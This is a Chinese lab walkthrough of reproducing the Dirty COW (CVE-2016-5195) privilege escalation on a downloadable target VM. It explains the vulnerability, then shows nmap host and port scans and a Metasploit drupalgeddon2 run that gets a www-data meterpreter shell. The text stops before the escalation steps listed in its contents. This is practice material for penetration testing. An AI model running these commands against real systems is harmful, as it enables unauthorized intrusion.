脏牛提权（靶机复现）

目录

一、脏牛漏洞概述

二、漏洞复现

1.nmap信息收集

1.1.查看当前IP地址

1.2.扫描当前网段，找出目标机器

1.3.快速扫描目标机全端口

三、访问收集到的资产

192.168.40.134:80

192.168.40.134:1898

四、msf攻击

1.查找对应exp

2.选择对应exp并配置相关设置

五、内网漏洞信息收集

六、漏洞利用

方法一

1.上传漏洞exp进行利用

2.上传exp

3.编译exp并使用python开启一个bash终端

4.执行编译后的exp

5.su登录root账户

方法二

1.通过排查信息，发现网站配置信息

2.ssh连接

3.传入exp并编译执行。

---

一、脏牛漏洞概述

脏牛漏洞，又叫Dirty COW，存在Linux内核中已经有长达9年的时间，在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围

Linux内核 >= 2.6.22（2007年发行，到2016年10月18日才修复）

漏洞编号

脏牛的CVE编号是CVE-2016-5195。

漏洞危害

低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权

漏洞原理

该漏洞具体为，Linux内核的内存子系统在处理写入复制（copy-on-write, COW）时产生了竞争条件（race condition）。

恶意用户可利用此漏洞，来获取高权限，对只读内存映射进行写访问。

竞争条件，指的是任务执行顺序异常，可导致应用崩溃，或令攻击者有机可乘，进一步执行其他代码。

利用这一漏洞，攻击者可在其目标系统提升权限，甚至可能获得root权限。

二、漏洞复现

• 环境：同一内网下
• 靶机下载：

• • 链接：百度网盘 请输入提取码
  • 提取码：TBUG

1.nmap信息收集

1.1.查看当前IP地址

┌──(root㉿tubug)-[~/桌面]
└─# ifconfig eth0 | grep inet
        inet 192.168.40.130  netmask 255.255.255.0  broadcast 192.168.40.255
        inet6 fe80::20c:29ff:fe88:e3c  prefixlen 64  scopeid 0x20<link>

1.2.扫描当前网段，找出目标机器

┌──(root㉿tubug)-[~/桌面]
└─# nmap -sP 192.168.40.0/24
/*
-s		指定扫描技术
-P		ping操作
-sP		使用ping操作来寻找存活主机
*/
 
发现目标机为：192.168.40.134

1.3.快速扫描目标机全端口

┌──(root㉿tubug)-[~/桌面]
└─# nmap -sS -p 1-65535 192.168.40.134
/*
-sS	SYN扫描技术
-p  指定端口
*/

三、访问收集到的资产

192.168.40.134:80

192.168.40.134:1898

访问发现关键信息网站指纹：Drupal

四、msf攻击

1.查找对应exp

┌──(root㉿tubug)-[~/桌面]
└─# msfconsole
msf6 > search drupal

2.选择对应exp并配置相关设置

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.40.134
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
meterpreter > getuid
Server username: www-data
 
该exp漏洞属于远程代码执行漏洞
构造特殊的HTTP请求，将恶意代码注入到网站的表单处理程序中从而执行恶意代码。

五、内网漏洞信息收集

https://www.wpsshop.cn/w/一键难忘520/article/detail/777780